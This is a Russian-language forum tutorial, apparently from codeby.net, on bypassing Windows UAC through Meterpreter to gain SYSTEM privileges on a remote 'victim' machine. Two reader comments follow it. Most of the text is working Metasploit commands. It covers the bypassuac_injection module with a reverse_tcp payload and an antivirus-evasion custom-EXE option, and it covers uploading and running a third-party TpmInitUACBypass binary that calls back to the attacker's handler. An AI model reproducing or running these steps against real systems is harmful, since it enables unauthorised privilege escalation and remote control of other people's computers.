• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Bypass UAC: Metasploit

Всем привет! В этой статье я бы хотел описать один важный прием в работе с Meterpreter’ом. А в частности:

Способ повышения привилегий до системных, обход UAC на удаленном компьютере (жертве).

В этой статье будет описано два таких способа. Оба успешно проверены на операционных системах - Windows 8.1, Windows 10.
Итак, по порядку – UAC и привилегии.
Если коротко, то UAC Контроль учетных записей пользователей – это функция, которая появилась еще в Windows Vista с тех пор «окна» она не покидает и только совершенствуется, ее цель предотвратить несанкционированные изменения в системных файлах компьютера. UAC обеспечивает защиту, запрашивая разрешение или пароль администратора перед совершением потенциально опасных для компьютера действий или при изменении параметров, которые могут оказать влияние на работу других пользователей.

Видим работу UAC мы в следующем:
upload_2016-9-2_12-54-9.png


Это помешает нам в полной мере ощутить власть над ПК жертвы, т.к. права у нас весьма ограничены. Подключившись к удаленному компьютеру с активным UAC (как это сделать, описано в первой части - https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/) вводим команду:

> getsystem

На что получаем ошибку с таким содержанием:
upload_2016-9-2_12-54-43.png


Приступаем к осуществлению задуманного. Пишем:

> background

> use exploit/windows/local/bypassuac_injection

> options

Видим список опций, затем выставляем:

> set target 1 (
разрядность атакуемой системы, 1 – х64)

> set LPORT 4444 (
не обязательно 4444)

> set session 1 (
номер сессии)

> set LHOST 172.16.XXX.XXX (свой IP)

> set payload windows/x64/meterpreter/reverse_tcp (
используем х64 версию meterpreter)

> exploit

upload_2016-9-2_12-55-35.png


Команда успешно отрабатывает и мы видим открывшуюся сессию под номером 2, уже с системными привилегиями.

upload_2016-9-2_12-56-14.png


Дальнейшие действия уже зависят от нашей фантазии)

Так же хочу заметить один момент, более продвинутые пользователи Metasploit, наверняка в курсе, что генерированный фреймворком пайлоад не самый лучший вариант, т.к. антивирусы не дремлют и рано или поздно он придет в негодность. Поэтому я хочу обратить внимание на интересную опцию EXE::Custom в данном эксплоите. В подобных этому, она тоже присутствует. Ее задача, указать НАШ .exe файл в качестве исполняемого пайлоада. Пример использования опции:

> show advanced

> set EXE::Custom /root/наш файл

> exploit

Ниже, во втором способе, речь пойдет примерно о таком способе.

Способ номер 2
.

Эта технология описывает запуск на удаленном компьютере, стороннего файла с полезной нагрузкой. Базовые привилегии позволяют нам загрузить файлы в некоторые директории на нем.

Скачиваем файл с нагрузкой TpmInit UACBypass отсюда - https://github.com/Cn33liz/TpmInitUACBypass/releases/tag/v1.0

В открытом терминале с meterpreter пишем:

> upload /root/Desktop/TpmIniyUACBypass.exe d:\\

Где,

upload ->
используется для загрузки файла.

/root/Desktop/TpmIniyUACBypass.exe
-> путь к файлу.

d:\\ ->
локация куда будет загружен файл.

upload_2016-9-2_12-57-39.png


Затем открываем второе окно с Metasploit и вводим следующее:

> use exploit/multi/handler

> set payload windows/x64/meterpreter/reverse_tcp

> set lhost 102.168.0.XXX

> set lport 4XXX

> exploit

Возвращаемся в предыдущее окно:

> shell

> d: (переходим туда, куда мы скопировали файл)

> TpmInitUACBypass.exe 192.168.0.ХХХ:4444 msf (запускаем файл)

upload_2016-9-2_12-58-32.png


Видим, что все прошло успешно, открылась сессия с системными привилегиями. Предыдущее окно можно закрывать.
На этом все. Вопросы и поправки жду в комментариях.
Спасибо за внимание.
 
K

Kareon07

Выдало при первом варианте:
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module

Уточните, пользователь у которого был загружен shell, должен быть в группе admin???
 
K

Kareon07

Подскажите, пожалуйста.Есть возможность на данный момент для ОС Windows Vista/7 повышения привилегий с USER до SYSTEM ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!